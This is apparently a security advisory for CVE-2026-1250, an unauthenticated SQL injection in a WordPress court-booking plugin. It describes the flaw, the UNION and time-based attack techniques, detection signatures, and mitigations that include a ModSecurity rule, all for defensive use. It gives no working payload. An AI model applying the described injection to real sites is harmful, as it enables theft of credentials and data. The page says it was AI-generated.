CVE-2026-1250 Overview
CVE-2026-1250 is a SQL Injection vulnerability in the Court Reservation – Manage Your Court Bookings Online plugin for WordPress. The flaw affects all versions up to and including 1.10.11. The vulnerability stems from insufficient escaping of the user-supplied id parameter combined with a lack of proper query preparation. Unauthenticated attackers can append additional SQL queries to existing database queries. Successful exploitation enables extraction of sensitive information from the WordPress database, including user credentials and session data.
Critical Impact
Unauthenticated remote attackers can extract sensitive database contents through injected SQL queries against vulnerable WordPress sites running the plugin.
Affected Products
- Court Reservation – Manage Your Court Bookings Online plugin for WordPress
- All plugin versions up to and including 1.10.11
- WordPress sites with the vulnerable plugin installed and activated
Discovery Timeline
- 2026-05-12 - CVE-2026-1250 published to NVD
- 2026-05-13 - Last updated in NVD database
Technical Details for CVE-2026-1250
Vulnerability Analysis
The vulnerability is classified as SQL Injection [CWE-89]. It exists in the public-facing component of the Court Reservation plugin, specifically in the handling of the id parameter referenced in class-courtres-public.php. The plugin concatenates the user-supplied id value into a SQL statement without applying $wpdb->prepare() or proper escaping routines such as esc_sql(). Attackers exploit this gap by injecting additional SQL clauses through the id parameter. The injected payload executes within the database context of WordPress, exposing arbitrary table contents including the wp_users table.
Root Cause
The root cause is improper neutralization of special elements used in an SQL command. The plugin developer relied on direct interpolation of the id request parameter into the query string. WordPress provides parameterized query mechanisms via $wpdb->prepare(), but the vulnerable code path bypasses these protections. This omission allows attacker-controlled input to alter the structure of the SQL statement.
Attack Vector
The attack vector is network-based and requires no authentication or user interaction. An attacker crafts an HTTP request to the vulnerable endpoint and supplies a malicious payload in the id parameter. Common techniques include UNION-based extraction to pull data from arbitrary tables and time-based blind injection when responses are not directly reflected. The vulnerability impacts confidentiality, as indicated by the CVSS confidentiality-focused vector, while integrity and availability remain unaffected.
For technical details on the vulnerable code path, refer to the WordPress Court Reservation Source Code and the Wordfence Vulnerability Intelligence Advisory.
Detection Methods for CVE-2026-1250
Indicators of Compromise
- HTTP requests containing SQL metacharacters in the id parameter such as UNION SELECT, ORDER BY, single quotes, or comment sequences (--, #).
- Web server access logs showing repeated requests to Court Reservation plugin endpoints with abnormally long or encoded id values.
- Unexpected database errors or slow query log entries originating from the plugin's PHP handlers.
- Outbound data transfer spikes following requests to vulnerable plugin URLs.
Detection Strategies
- Deploy web application firewall (WAF) rules that inspect the id parameter for SQL injection signatures targeting WordPress plugin endpoints.
- Enable MySQL or MariaDB general query logging to identify malformed queries originating from the plugin.
- Audit installed plugin versions across WordPress fleets and flag instances running 1.10.11 or earlier.
Monitoring Recommendations
- Monitor authentication logs for new administrator account creation following suspicious plugin requests.
- Track HTTP 500 responses and PHP errors tied to the Court Reservation plugin namespace.
- Alert on database queries containing unusual INFORMATION_SCHEMA references coming from the WordPress application user.
How to Mitigate CVE-2026-1250
Immediate Actions Required
- Deactivate and remove the Court Reservation plugin until a patched version is verified and installed.
- Audit the WordPress database for unauthorized read activity, including access to wp_users and wp_options tables.
- Rotate all administrator passwords and invalidate active sessions if exploitation is suspected.
- Apply WAF virtual patching rules to block SQL injection payloads against the plugin's request handlers.
Patch Information
At the time of publication, the vendor advisory references versions up to and including 1.10.11 as vulnerable. Site administrators should monitor the plugin's WordPress.org page and the Wordfence Vulnerability Intelligence Advisory for an updated release that introduces prepared statements via $wpdb->prepare().
Workarounds
- Restrict access to plugin endpoints using .htaccess or NGINX location rules limiting access to authenticated IP ranges.
- Configure the WordPress database user with least-privilege permissions to reduce data exposure if exploitation occurs.
- Enable a WAF with SQL injection signatures targeting WordPress query parameters.
# Example ModSecurity rule to block SQLi attempts against the id parameter
SecRule ARGS:id "@detectSQLi" \
"id:1002600,phase:2,deny,status:403,\
msg:'CVE-2026-1250 SQLi attempt against Court Reservation plugin',\
tag:'CWE-89'"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
